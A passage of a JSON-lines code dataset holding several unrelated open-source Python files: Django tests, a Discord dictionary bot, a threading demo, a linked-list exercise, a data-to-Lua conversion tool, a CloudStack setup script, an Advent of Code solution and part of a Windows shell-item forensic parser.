encoding='utf-8'))\r\n\r\n def test_func_impl_loadone(self):\r\n # packing.loaddata()\r\n c = self.c\r\n data = {'appname':self.appname,\r\n 'tablename':self.tablename,\r\n 'itemid':1}\r\n response = c.post('/impl/loadone',data=data)\r\n self.assertEqual(response.status_code,200)\r\n # print ('test_func_impl_loadone',str(response.content,encoding='utf-8'))\r\n\r\n def test_func_impl_saveobj(self):\r\n # packing.loaddata()\r\n c = self.c\r\n data = {\r\n 'appname':self.appname,\r\n 'tablename':self.tablename,\r\n 'obj':json.dumps({\r\n 'item_name':'test_item_name',\r\n 'item_type':'工作考核',\r\n 'score_total':10000.0,\r\n 'score_default':0,\r\n 'score_top_limit':10000.0,\r\n 'score_bottom_limit':0,\r\n 'item_count_limit':0,\r\n }),\r\n }\r\n response = c.post('/impl/saveobj',data=data)\r\n self.assertEqual(response.status_code,200)\r\n # print ('test_func_impl_saveobj',str(response.content,encoding='utf-8'))\r\n\r\n\r\n\r\n\r\nfrom login import func\r\nclass func_load_test(TestCase):\r\n def setUp(self):\r\n pass\r\n def test_func_impl_loadmodels(self):\r\n data = {\r\n 'appname':'conf',\r\n }\r\n\r\n res = func.loadtables(**data)\r\n self.assertListEqual(res, ['ConfExaminationItem', 'ConfExaminationPlot'])\r\n\r\n\r\n","repo_name":"MrLi008/py_django_implement","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"2712750021","text":"#including required modules to the program\r\nimport os\r\nimport requests\r\nimport json\r\nimport discord\r\nimport datetime\r\n\r\nfrom dotenv import load_dotenv\r\n\r\nload_dotenv()\r\nTOKEN = os.getenv('DISCORD_TOKEN')\r\n\r\nclient = discord.Client()\r\n\r\n@client.event\r\nasync def on_ready():\r\n print(f'{client.user.name} has connected to Discord!')\r\n\r\n\r\n@client.event\r\nasync def on_member_join(member):\r\n await member.create_dm()\r\n await member.dm_channel.send(f'Hi {member.name}, welcome to my Discord server!')\r\n\r\n\r\n@client.event\r\nasync def on_message(message):\r\n if message.author == client.user:\r\n return\r\n\r\n msg = message.content\r\n\r\n if msg == '$help':\r\n embedv = discord.Embed(title='Dicti\\'s walkthrough', \r\n color=0xFF5733,\r\n timestamp=datetime.datetime.utcnow())\r\n\r\n embedv.set_thumbnail(url = 'https://i.imgur.com/emVAdxH.jpg')\r\n\r\n embedv.add_field(name = '`$help`',\r\n value = 'Displays the list of commands supported by Dicti and the specific syntax need for the usage',\r\n inline = False)\r\n\r\n embedv.add_field(name = '`$dict `',\r\n value = 'Displays information on the word used involving parameters such as definitions, synonyms, phonetics, etc.',\r\n inline = False)\r\n\r\n embedv.add_field(name = '`$urban `',\r\n value = 'Displays information regarding the colloquial use of the word and the its different meanings under different contexts',\r\n inline = False)\r\n\r\n await message.channel.send(embed = embedv)\r\n\r\n # if msg.startswith('$urban'):\r\n # word = msg.split('$urban ', 1)[1]\r\n\r\n # response = requests.get(\"https://api.urbandictionary.com/v0/define?term=\" + word)\r\n # json_data = json.loads(response.text)\r\n\r\n # deflist = json_data['list']\r\n # n = len(deflist)\r\n\r\n # if n > 0:\r\n # deflist = sorted(deflist, key = lambda x: x['thumbs_up'], reverse = True)\r\n # n = min(5, n)\r\n\r\n # page = []\r\n\r\n\r\n\r\n\r\n\r\n \r\n # else:\r\n # noword = 'No meanings found'\r\n # await message.channel.send(noword)\r\n\r\n if msg.startswith('$dict'):\r\n word = msg.split('$dict ', 1)[1]\r\n\r\n response = requests.get(\"https://api.dictionaryapi.dev/api/v2/entries/en/\" + word)\r\n json_data = json.loads(response.text)\r\n\r\n if type(json_data) == list:\r\n n = len(json_data)\r\n\r\n page = []\r\n \r\n for i in range(n):\r\n embedv = discord.Embed(title = 'Dictionary ('+str(i+1)+'/'+str(n)+')', \r\n description = json_data[i]['word'].title(), \r\n color=0xFF5733,\r\n timestamp=datetime.datetime.utcnow()) \r\n\r\n embedv.add_field(name = '\\u200b', \r\n value = '**Origin: **'+json_data[i]['origin'] +'\\n' + '**Parts of Speech: **'+json_data[i]['meanings'][0]['partOfSpeech'],\r\n inline = False)\r\n\r\n embedv.add_field(name = '\\u200b',\r\n value = '\\u200b', \r\n inline = False)\r\n\r\n embedv.add_field(name = 'Phonetics',\r\n value = 'Text: '+json_data[i]['phonetics'][0]['text'] + '\\n' + 'Audio: '+json_data[i]['phonetics'][0]['audio'],\r\n inline = False)\r\n\r\n embedv.add_field(name = '\\u200b',\r\n value = '\\u200b', \r\n inline = False)\r\n\r\n defs = json_data[i]['meanings'][0]['definitions']\r\n\r\n for j in range(len(defs)):\r\n x = len(defs[j]['synonyms'])\r\n y = len(defs[j]['antonyms'])\r\n\r\n if x > 0 and y > 0:\r\n embedv.add_field(name = 'Definition '+str(j+1),\r\n value = defs[j]['definition'] + '\\n' + 'Synonyms: ' + str(defs[j]['synonyms'][:min(x,5)]) + '\\n' + 'Antonyms: ' + str(defs[j]['antonyms'][:min(y,5)]), \r\n inline = False) \r\n elif x > 0 and y == 0:\r\n embedv.add_field(name = 'Definition '+str(j+1),\r\n value = defs[j]['definition'] + '\\n' + 'Synonyms: ' + str(defs[j]['synonyms'][:min(x,5)]), \r\n inline = False) \r\n elif x == 0 and y > 0:\r\n embedv.add_field(name = 'Definition '+str(j+1),\r\n value = defs[j]['definition'] + '\\n' + 'Antonyms: ' + str(defs[j]['antonyms'][:min(y,5)]), \r\n inline = False) \r\n else:\r\n embedv.add_field(name = 'Definition '+str(j+1),\r\n value = defs[j]['definition'], \r\n inline = False) \r\n\r\n embedv.add_field(name = '\\u200b',\r\n value = '\\u200b', \r\n inline = False) \r\n\r\n page.append(embedv)\r\n \r\n emb = await message.channel.send(embed = page[0])\r\n await emb.add_reaction(\"◀️\")\r\n await emb.add_reaction(\"▶️\")\r\n\r\n def check(reaction, user):\r\n return user == message.author\r\n\r\n k = 0 \r\n reaction = None\r\n\r\n while True:\r\n if str(reaction) == '◀️':\r\n if k > 0:\r\n k -= 1\r\n await emb.edit(embed = page[k])\r\n elif str(reaction) == '▶️':\r\n if k < n-1:\r\n k += 1\r\n await emb.edit(embed = page[k])\r\n\r\n try:\r\n reaction, user = await client.wait_for('reaction_add', timeout = 30.0, check = check)\r\n await emb.remove_reaction(reaction, user)\r\n except:\r\n break\r\n \r\n else:\r\n noword = json_data['title']\r\n await message.channel.send(noword)\r\n\r\nclient.run(TOKEN)","repo_name":"MistaAsh/Dicti-bot","sub_path":"dicti.py","file_name":"dicti.py","file_ext":"py","file_size_in_byte":5945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"781394489","text":"from threading import Thread\r\nfrom random import choice\r\nimport time\r\n\r\nauthor = 'Jencent Dizon'\r\nlink = 'https://github.com/I-am-Programmer-101'\r\nprint(\"Author:\",author,\"\\nLink:\",link)\r\n\r\ndata = [90,81,78,95,79,72,85]\r\n\r\nclass MyThread(Thread):\r\n \r\n def __init__(self, val):\r\n # Costructor\r\n Thread.__init__(self)\r\n self.val = val\r\n \r\n \r\n def run(self):\r\n for i in range(1):\r\n time.sleep(2)\r\n print('Average Value:',choice(data),'in %s' % (self.getName()))\r\n print('Maximum Value:',choice(data),'in %s' % (self.getName()))\r\n print('Minimum Value:',choice(data),'in %s' % (self.getName()))\r\n\r\n \r\n \r\n# Run following code when the program starts\r\nif __name__ == '__main__':\r\n print('Thread Starting...')\r\n # Declare objects of MyThread class\r\n myThreadOb1 = MyThread(3)\r\n myThreadOb1.setName('Thread 1')\r\n \r\n myThreadOb2 = MyThread(3)\r\n myThreadOb2.setName('Thread 2')\r\n\r\n myThreadOb3 = MyThread(3)\r\n myThreadOb3.setName('Thread 3')\r\n \r\n # Start running the threads!\r\n myThreadOb1.start()\r\n myThreadOb2.start()\r\n myThreadOb3.start()\r\n\r\n # Wait for the threads to finish...\r\n myThreadOb1.join()\r\n myThreadOb2.join()\r\n myThreadOb3.join()\r\n\r\n print('Thread Terminating...')\r\n","repo_name":"jencent101/Threading","sub_path":"threading.py","file_name":"threading.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"2307143748","text":"#User function Template for python3\n\n'''\nclass Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n self.prev = None\n'''\n\ndef reverseDLL(head):\n if not head or not head.next :\n return head\n prev = None\n cur = head\n while cur :\n tmp = cur.next\n cur.next = prev\n cur.prev = tmp\n prev = cur\n cur = tmp\n return prev\n\n\n\n# Driver code Starts\nclass Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n self.prev = None\n\nclass DoublyLinkedList:\n def __init__(self):\n self.head = None\n\n def push(self, new_data,tail):\n if not self.head:\n self.head=Node(new_data)\n return self.head\n Nnode=Node(new_data)\n Nnode.prev=tail\n tail.next=Nnode\n return Nnode\n\n def printList(self, node):\n while(node is not None):\n print (node.data,end=' ')\n node = node.next\n\n\n\nif __name__ == '__main__':\n t=int(input())\n\n for tcs in range(t):\n n=int(input())\n arr=[int(x) for x in input().split()]\n\n\n dll=DoublyLinkedList()\n tail=None\n\n for e in arr:\n tail=dll.push(e,tail)\n\n resHead=reverseDLL(dll.head)\n dll.printList(resHead)\n print()\n\n# Driver Code Ends\n","repo_name":"VbhvGupta/workspace","sub_path":"GFG/ReverseDLL.py","file_name":"ReverseDLL.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"24202807630","text":"# -*- coding: utf-8 -*-\r\nclass LanguageObject(object):\r\n \r\n lang= None\r\n langDefault = None\r\n def __init__(self):\r\n pass\r\n \r\n @classmethod\r\n def setLanguage(cls,lang):\r\n \r\n cls.lang = []\r\n cls.langDefault = {}\r\n for l in lang:\r\n language = Language(id_language_label= l.id_language_label,\r\n module= l.module,\r\n default_label= l.default_label,\r\n message_en= l.message_en,\r\n message_th= l.message_th\r\n )\r\n cls.lang.append( language)\r\n cls.langDefault[l.default_label] = language\r\n \r\n @classmethod\r\n def getLanguage(cls):\r\n return cls.lang\r\n \r\n @classmethod\r\n def getdata(cls,key,lang='EN'):\r\n if (cls.langDefault is not None and cls.langDefault[key] is not None) :\r\n if 'th'.upper() == lang.upper():\r\n return cls.langDefault[key].message_th\r\n else:\r\n return cls.langDefault[key].message_en\r\n return key\r\n \r\n\r\nclass Language(object):\r\n def __init__(self,id_language_label=None,module=None,default_label=None,message_en=None, message_th=None):\r\n self.id_language_label = id_language_label\r\n self.module = module\r\n self.default_label = default_label\r\n self.message_en = message_en\r\n self.message_th = message_th","repo_name":"tongpa/JMProject","sub_path":"PyPollModel/surveyobject/languageobject.py","file_name":"languageobject.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"43077900185","text":"#-*-encoding:utf8-*-\n#!/bin/python\n\nimport os\nimport hashlib\nimport yaml\nimport zipfile\nimport time\nimport sys, getopt\n#import oss_util\nfrom jinja2 import *\nimport datetime\ntry:\n import xml.etree.cElementTree as ET\nexcept ImportError:\n import xml.etree.ElementTree as ET\nimport dbutil\nimport shutil\n\ndef tableToClass(fieldName):\n strs = fieldName.split('_')\n result = ''\n for str in strs:\n result = result + str.capitalize()\n return result\n\ndef columnNameToFieldName(columnName):\n strs = columnName.split('_')\n result = ''\n index = 1\n for str in strs:\n if index == 1:\n result = result + str[0].lower() + str[1:]\n else:\n result = result + str.capitalize()\n index = index + 1\n return result\n\nclass Loader( BaseLoader ):\n def __init__(self, parent):\n self.env = Environment( loader=FileSystemLoader(parent))\n self.env.template_class = Template\n self.env.globals['tableToClass'] = tableToClass\n self.env.globals['columnNameToFieldName'] = columnNameToFieldName\n\n'''\nsdata数据转换为lua\n'''\nclass sdatatolua:\n '''\n 构造函数\n '''\n def __init__(self, config):\n self.game = config['game']\n self.sdataZipPath = config['sdata_zip_path']\n self.sdataVersion = config['sdata_version']\n self.confFilePath = config['config_file_path']\n self.env = config['env']\n self.mode = config['mode']\n\n self.log(\"env:%s\", self.env)\n self.log(\"game:%s\", self.game)\n self.log(\"sdataZipPath:%s\", self.sdataZipPath)\n self.log(\"sdataVersion:%s\", self.sdataVersion)\n\n self.loadConfig()\n\n if self.mode == 'db':\n self.dbutil = dbutil.DBUtil(host=self.dbConf['host'], db=self.dbConf['db'], user=self.dbConf['user'], passwd=self.dbConf['password'])\n\n # oss客户端\n # self.oss = oss_util.oss_util(access_key_id=self.ossConf['access_key_id'],\n # access_key_secret=self.ossConf['access_key_secret'],\n # bucket_name=self.ossConf['bucket_name'],\n # endpoint=self.ossConf['endpoint'])\n '''\n 载入配置\n '''\n def loadConfig(self):\n filepath = os.path.join(self.confFilePath, \"sdata.yml\")\n f = open(filepath, 'rb')\n # self.conf = yaml.load(f.read(), Loader=yaml.FullLoader)\n self.conf = yaml.load(f.read())\n f.close()\n\n sdataBaseDir=self.conf['output_dir']\n try:\n sdataBaseDir = sdataBaseDir%self.env\n except:\n pass\n\n self.sdataDir = os.path.join(sdataBaseDir, self.game)\n self.ossConf = self.conf['oss']\n self.tablesConf = self.conf['tables']\n self.dbConf = self.conf['db']\n\n '''\n 将Sdata转换为Lua\n '''\n def doSdataToLua(self):\n # 1. 检查工作空间\n self.doEnvCheck()\n\n # 2. 解压资源\n self.unzipSdataZip()\n\n # 3. 生成动更\n self.genSdataToLua()\n\n # 4. 清理\n self.doClean()\n\n\n '''\n 环境检查\n '''\n def doEnvCheck(self):\n if not os.path.exists(self.sdataDir):\n self.log(\"第一次生成SdataToLua,创建目录:%s\", self.sdataDir)\n os.makedirs(self.sdataDir)\n self.log(\"sdataDir:%s\", self.sdataDir)\n\n # 目标路径\n self.newVersionDir = os.path.join(self.sdataDir, self.sdataVersion)\n if not os.path.exists(self.newVersionDir):\n os.makedirs(self.newVersionDir)\n self.log(\"sdataVersionDir:%s\", self.newVersionDir)\n\n\n '''\n 解压资源zip\n '''\n def unzipSdataZip(self):\n if self.mode == 'db':\n return\n\n if not os.path.exists(self.sdataZipPath):\n self.log(\"资源文件不存在, path:%s\", self.sdataZipPath)\n sys.exit(2)\n return\n\n # 解压文件\n dynamicZipFile = zipfile.ZipFile(self.sdataZipPath, 'r')\n count = 0\n start = time.time()\n totalCount = dynamicZipFile.namelist().__len__()\n for file in dynamicZipFile.namelist():\n end = time.time()\n if end - start > 1:\n start = time.time()\n self.log(\"资源包解压中:%s/%s\", count, totalCount)\n count += 1\n if file.endswith(\".xml\"):\n self.sdataXmlFile = os.path.join(self.newVersionDir, file)\n\n dynamicZipFile.extract(file, self.newVersionDir)\n self.log(\"资源包解压中:%s/%s\", count, totalCount)\n\n dynamicZipFile.close()\n\n # 检查版本号\n version = self.loadVersionTxt(os.path.join(self.newVersionDir, 'version.txt'))\n\n if (version != self.sdataVersion):\n self.log(\"错误的打包静态库版本号:%s, 输入版本号:%s\", version, self.sdataVersion)\n sys.exit(2)\n\n self.log(\"sdataXmlFile:%s\", self.sdataXmlFile)\n\n\n '''\n 生产sdataLua文件\n '''\n def genSdataToLua(self):\n if self.mode == 'db':\n self.genSdataToLuaByDB()\n else:\n self.genSdataToLuaByXML()\n\n '''\n 生产sdataLua文件(db)\n '''\n def genSdataToLuaByDB(self):\n # 读取xml文件\n self.log(\"genSdataToLua\")\n\n tablesMap = {}\n filePath = os.path.join(self.newVersionDir, 'SdataData.lua')\n f = open(filePath, 'wb')\n results = self.dbutil.query(\"show tables\")\n for tableName in results:\n name = tableName['Tables_in_%s'%self.dbConf['db']]\n # 查看配置文件是否需要处理\n if not self.tablesConf.has_key(name):\n continue\n\n tableResults = self.dbutil.query(\"select * from %s\"%name)\n datas = []\n rowKeys = self.tablesConf[name]['rowKey']\n for row in tableResults:\n dataMap = {}\n for key, value in row.iteritems():\n dataMap[str(key)] = self.getValue(value)\n\n dataMap['rowData'] = ''\n for rowKey in rowKeys.split(\",\"):\n if dataMap['rowData'] != '':\n dataMap['rowData'] = dataMap['rowData'] + \"-\" + dataMap[rowKey]\n else:\n dataMap['rowData'] = dataMap[rowKey]\n datas.append(dataMap)\n\n tableMap = {}\n tableMap['datas'] = datas\n tableMap['fields'] = self.tablesConf[name]['fields']\n tablesMap[name] = tableMap\n\n # 载入模板环境\n env = Loader(self.confFilePath).env\n now = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n # 生成domain文件\n self.log(\"configFilePath:%s\", self.confFilePath)\n template = env.get_template(\"sdatatolua.template\", parent=self.confFilePath)\n result = template.render(tables=tablesMap, time=now, sdataVersion=self.sdataVersion)\n\n contentMD5 = self.md5(result.encode(\"utf-8\"))\n\n f.write(result.encode('utf8'))\n f.write('sdata.time = \"%s\"\\n'%now)\n f.write('sdata.version = \"%s\"\\n'%self.sdataVersion)\n f.write('sdata.md5 = \"%s\"'%contentMD5)\n f.flush()\n\n\n fileMD5 = self.md5file(filePath)\n self.log(\"contentMD5:%s\", contentMD5)\n self.log(\"fileMD5:%s\", fileMD5)\n self.log(\"filePath:%s\", os.path.abspath(filePath))\n\n # 生产zipFile\n fileList = []\n fileList.append('SdataData.lua')\n self.createZipFile(os.path.join(self.sdataDir, contentMD5+\".zip\"), fileList)\n\n '''\n 生产sdataLua文件(XML)\n '''\n def genSdataToLuaByXML(self):\n # 读取xml文件\n self.log(\"genSdataToLua\")\n domTree = ET.ElementTree(file=self.sdataXmlFile)\n root = domTree.getroot()\n\n filePath = os.path.join(self.newVersionDir, 'SdataData.lua')\n f = open(filePath, 'wb')\n tablesMap = {}\n for child in domTree.iter(tag='table'):\n table = child\n name = table.attrib[\"name\"]\n\n # 查看配置文件是否需要处理\n if not self.tablesConf.has_key(name):\n continue\n\n datas = []\n for row in table:\n dataMap = {}\n for field in row:\n key = field.attrib[\"name\"]\n value = field.text\n dataMap[key] = value\n datas.append(dataMap)\n\n tableMap = {}\n tableMap['datas'] = datas\n tableMap['rowKey'] = self.tablesConf[name]['rowKey']\n tableMap['fields'] = self.tablesConf[name]['fields']\n tablesMap[name] = tableMap\n\n # 载入模板环境\n env = Loader().env\n now = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n # 生成domain文件\n template = env.get_template(\"sdatatolua.template\", self.confFilePath)\n result = template.render(tables=tablesMap, time=now, sdataVersion=self.sdataVersion)\n\n contentMD5 = self.md5(result.encode(\"utf-8\"))\n\n f.write(result.encode('utf8'))\n f.write('sdata.time = \"%s\"\\n'%now)\n f.write('sdata.version = \"%s\"\\n'%self.sdataVersion)\n f.write('sdata.md5 = \"%s\"'%contentMD5)\n f.flush()\n\n\n fileMD5 = self.md5file(filePath)\n self.log(\"contentMD5:%s\", contentMD5)\n self.log(\"fileMD5:%s\", fileMD5)\n\n '''\n 执行清理操作\n '''\n def doClean(self):\n try:\n shutil.rmtree(self.newVersionDir)\n except:\n pass\n\n '''\n 载入version.txt\n '''\n def loadVersionTxt(self, filepath):\n # 打开version.lua\n version = None\n resFile = open(filepath, 'rb')\n for line in resFile.readlines():\n if line == None or line.strip() == \"\":\n continue\n line = line.strip()\n version = line.strip()\n break\n\n resFile.close()\n\n return version\n\n '''\n 创建zipfile\n '''\n def createZipFile(self, zipFilePath, fileList):\n self.log(\"生成包:%s\", zipFilePath)\n zFile = zipfile.ZipFile(zipFilePath, 'w', compression=zipfile.ZIP_DEFLATED)\n\n for filename in fileList:\n filepath = os.path.join(self.newVersionDir, filename)\n zFile.write(filepath, filename)\n # self.log(\"pack zip file:%s, file:%s\", zipFilePath, filename)\n\n zFile.close()\n\n '''\n 拷贝文件\n '''\n def copyFile(self, filepath, filename):\n topath = os.path.join(self.out_dir, filename)\n self.execCmd(\"cp %s %s\", filepath, topath)\n\n '''\n 计算字符串md5\n '''\n def md5(self, content):\n m = hashlib.md5()\n m.update(content)\n\n return m.hexdigest()\n\n '''\n 计算文件md5\n '''\n def md5file(self, filepath):\n m = hashlib.md5()\n md5file = open(filepath, 'rb')\n m.update(md5file.read())\n md5file.close()\n\n return m.hexdigest()\n\n '''\n 执行系统命令\n '''\n def execCmd(self, cmd, *args):\n print(args)\n if args != None and len(args) > 0:\n cmd = cmd%args\n\n p = os.popen(cmd)\n self.log(\"exec cmd: %s end. rtn:%s\", cmd, p.read())\n\n '''\n 打印日志\n '''\n def log(self, fmt, *args):\n if args == None and len(args) == 0:\n return\n\n print(fmt%args)\n\n '''\n 获取值\n '''\n def doSQL(self, sql):\n return sql.replace('%s', '\\'' + '%s' + '\\'')\n \n '''\n 获取db值\n '''\n def getValue(self, value):\n valueTypeName = type(value).__name__\n rtn = None\n if valueTypeName != 'str' and valueTypeName != 'unicode':\n rtn = str(value)\n else:\n rtn = value\n\n if rtn.find('\"') != -1:\n rtn = rtn.replace('\"', '\\\\\"')\n return rtn\n\ndef main(argv):\n config = {\n \"game\": \"zjzr2\",\n \"sdata_zip_path\": \"C:\\\\Users\\\\wangys\\\\Downloads\\\\sdata.zip\",\n \"sdata_version\": \"0.0.0.0\",\n \"env\": \"dev\",\n \"mode\": \"db\",\n \"config_file_path\": \"tools\"\n }\n try:\n opts, args = getopt.getopt(argv, \"g:p:v:r:s:e:t:h:\", [\"game=\", \"path=\", \"version=\", \"region\", \"scope=\", \"env=\", \"tips=\", \"help=\"])\n except getopt.GetoptError:\n print('hotupdate -g -p -v -r -s -e [-t ]')\n sys.exit(2)\n\n for opt, arg in opts:\n if opt in (\"-g\", \"--game\"):\n config['game'] = arg\n elif opt in (\"-p\", \"--path\"):\n config['res_zip_path'] = arg\n elif opt in (\"-v\", \"--version\"):\n config['game_version'] = arg\n elif opt in (\"-r\", \"--region\"):\n config['region'] = arg\n elif opt in (\"-s\", \"--scope\"):\n config['scope'] = arg\n elif opt in (\"-e\", \"--env\"):\n config['env'] = arg\n elif opt in (\"-t\", \"--tips\"):\n config['update_tips'] = arg\n elif opt in (\"-h\", \"--help\"):\n print('hotupdate -g -p -v -r -s -e [-t ]')\n # /home/hario/hotupdate.sh --game ${option.game} --region ${option.region} --scope ${option.scope} --version ${option.version} --env ${option.env} --isBeta ${option.isBeta} --hides ${option.hides}\n # -g gmmx -p F:/hotupdate/gmmx_cn_9.9.9.9_android_20190527180239_191_static_dynamic.zip -v 9.9.9.9 -r cn_luajit32 -u android,ast -t tips\n\n p = sdatatolua(config)\n p.doSdataToLua()\n\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","repo_name":"qq4215279/study_python","sub_path":"py_study_2.7_test/sbtj_tools/sdatatolua.py","file_name":"sdatatolua.py","file_ext":"py","file_size_in_byte":13589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"33780711425","text":"try:\n from setuptools import setup, find_packages\nexcept ImportError:\n try:\n from distribute_setup import use_setuptools\n use_setuptools()\n from setuptools import setup, find_packages\n except ImportError:\n raise RuntimeError(\"python setuptools is required to build Marvin\")\n\n\nVERSION = \"4.19.0.0\"\n\nsetup(name=\"Marvin\",\n version=VERSION,\n description=\"Marvin - Python client for Apache CloudStack\",\n author=\"The Apache CloudStack Team\",\n author_email=\"dev@cloudstack.apache.org\",\n maintainer=\"The Apache CloudStack Team\",\n maintainer_email=\"dev@cloudstack.apache.org\",\n long_description=\"Marvin is the Apache CloudStack python \"\n \"client written around the unittest framework\",\n platforms=(\"Any\",),\n url=\"https://builds.apache.org/job/cloudstack-marvin/\",\n packages=[\"marvin\", \"marvin.cloudstackAPI\",\n \"marvin.lib\", \"marvin.config\", \"marvin.sandbox\",\n \"marvin.sandbox.advanced\", \"marvin.sandbox.advancedsg\",\n \"marvin.sandbox.basic\"],\n license=\"LICENSE.txt\",\n install_requires=[\n \"mysql-connector-python <= 8.0.30\",\n \"requests >= 2.2.1\",\n \"paramiko >= 1.13.0\",\n \"nose >= 1.3.3\",\n \"ddt >= 0.4.0\",\n \"pyvmomi >= 5.5.0\",\n \"netaddr >= 0.7.14\",\n \"dnspython\",\n \"ipmisim >= 0.7\",\n \"pytz\",\n \"retries\",\n \"PyCrypt\",\n \"kubernetes\",\n \"urllib3\",\n \"setuptools >= 40.3.0\"\n ],\n py_modules=['marvin.marvinPlugin'],\n zip_safe=False,\n entry_points={\n 'nose.plugins': ['marvinPlugin = marvin.marvinPlugin:MarvinPlugin'],\n 'console_scripts': ['marvincli = marvin.deployAndRun:main']\n },\n )\n","repo_name":"apache/cloudstack","sub_path":"tools/marvin/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":1557,"dataset":"github-code","pt":"32"}
+{"seq_id":"19202127125","text":"file = open('puzzle/07.in', 'r')\ncontent = file.read().splitlines()\n\n# part 1\nmatryoshka = {'shiny gold'}\nbf_length = 0\nwhile bf_length != len(matryoshka):\n bf_length = len(matryoshka)\n for expression in content:\n contained_colors = set()\n for sentence in expression.split('contain')[1].split(','):\n contained_colors.add(sentence[3:sentence.index('bag') - 1])\n if set.intersection(matryoshka, contained_colors) != set():\n matryoshka.add(expression.split('contain')[0][:-6])\nmatryoshka.remove('shiny gold')\nprint(len(matryoshka))\n\n# part 2\nparents = {}\nfor expression in content:\n if expression.split('bags')[0][:-1] not in matryoshka:\n if expression.split('contain ')[1] == 'no other bags.':\n parents[expression.split('bags')[0][:-1]] = 0\n else:\n inside = expression.split('contain')[1].split(',')\n value = []\n for bag in inside:\n value.extend([bag[1], bag[3:bag.index('bag')-1]])\n parents[expression.split('bags')[0][:-1]] = value\nint_parents = {}\nfor bag in parents:\n if isinstance(parents[bag], int):\n int_parents[bag] = parents[bag]\n\nwhile int_parents != parents:\n for color in parents:\n if color not in int_parents:\n for bag in range(1, len(parents[color]), 2):\n if parents[color][bag] not in int_parents:\n break\n else:\n value = 0\n for bag in range(0, len(parents[color]), 2):\n value += int(parents[color][bag])*(1 + parents[parents[color][bag+1]])\n parents[color] = int_parents[color] = value\nprint(parents['shiny gold'])\n","repo_name":"michalwasik/Advent-of-Code","sub_path":"2020/07.py","file_name":"07.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"17029632021","text":"import pyfwsi\n\nfrom plaso.events import shell_item_events\nfrom plaso.lib import eventdata\nfrom plaso.winnt import shell_folder_ids\n\n\nif pyfwsi.get_version() < '20140714':\n raise ImportWarning(\n u'Shell item support fuctions require at least pyfwsi 20140714.')\n\n\nclass ShellItemsParser(object):\n \"\"\"Parses for Windows NT shell items.\"\"\"\n\n NAME = 'shell_items'\n\n def __init__(self, origin):\n \"\"\"Initializes the parser.\n\n Args:\n origin: A string containing the origin of the event (event source).\n \"\"\"\n super(ShellItemsParser, self).__init__()\n self._origin = origin\n self._path_segments = []\n\n def _ParseShellItem(self, parser_context, shell_item):\n \"\"\"Parses a shell item.\n\n Args:\n parser_context: A parser context object (instance of ParserContext).\n shell_item: the shell item (instance of pyfwsi.item).\n \"\"\"\n path_segment = None\n\n if isinstance(shell_item, pyfwsi.root_folder):\n description = shell_folder_ids.DESCRIPTIONS.get(\n shell_item.shell_folder_identifier, None)\n\n if description:\n path_segment = description\n else:\n path_segment = u'{{{0:s}}}'.format(shell_item.shell_folder_identifier)\n\n elif isinstance(shell_item, pyfwsi.volume):\n if shell_item.name:\n path_segment = shell_item.name\n elif shell_item.identifier:\n path_segment = u'{{{0:s}}}'.format(shell_item.identifier)\n\n elif isinstance(shell_item, pyfwsi.file_entry):\n long_name = u''\n localized_name = u''\n file_reference = u''\n for exension_block in shell_item.extension_blocks:\n if isinstance(exension_block, pyfwsi.file_entry_extension):\n long_name = exension_block.long_name\n localized_name = exension_block.localized_name\n file_reference = exension_block.file_reference\n if file_reference:\n file_reference = u'{0:d}-{1:d}'.format(\n file_reference & 0xffffffffffff, file_reference >> 48)\n\n fat_date_time = exension_block.get_creation_time_as_integer()\n if fat_date_time:\n event_object = shell_item_events.ShellItemFileEntryEvent(\n fat_date_time, eventdata.EventTimestamp.CREATION_TIME,\n shell_item.name, long_name, localized_name, file_reference,\n self._origin)\n parser_context.ProduceEvent(event_object, parser_name=self.NAME)\n\n fat_date_time = exension_block.get_access_time_as_integer()\n if fat_date_time:\n event_object = shell_item_events.ShellItemFileEntryEvent(\n fat_date_time, eventdata.EventTimestamp.ACCESS_TIME,\n shell_item.name, long_name, localized_name, file_reference,\n self._origin)\n parser_context.ProduceEvent(event_object, parser_name=self.NAME)\n\n fat_date_time = shell_item.get_modification_time_as_integer()\n if fat_date_time:\n event_object = shell_item_events.ShellItemFileEntryEvent(\n fat_date_time, eventdata.EventTimestamp.MODIFICATION_TIME,\n shell_item.name, long_name, localized_name, file_reference,\n self._origin)\n parser_context.ProduceEvent(event_object, parser_name=self.NAME)\n\n if long_name:\n path_segment = long_name\n elif shell_item.name:\n path_segment = shell_item.name\n\n elif isinstance(shell_item, pyfwsi.network_location):\n if shell_item.location:\n path_segment = shell_item.location\n\n if path_segment is None and shell_item.class_type == 0x00:\n # TODO: check for signature 0x23febbee\n pass\n\n if path_segment is None:\n path_segment = u'UNKNOWN: 0x{0:02x}'.format(shell_item.class_type)\n\n self._path_segments.append(path_segment)\n\n def CopyToPath(self):\n \"\"\"Copies the shell items to a path.\n\n Returns:\n A Unicode string containing the converted shell item list path or None.\n \"\"\"\n if not self._path_segments:\n return\n\n return u', '.join(self._path_segments)\n\n def Parse(self, parser_context, byte_stream, codepage='cp1252'):\n \"\"\"Parses the shell items from the byte stream.\n\n Args:\n parser_context: A parser context object (instance of ParserContext).\n byte_stream: a string holding the shell items data.\n codepage: Optional byte stream 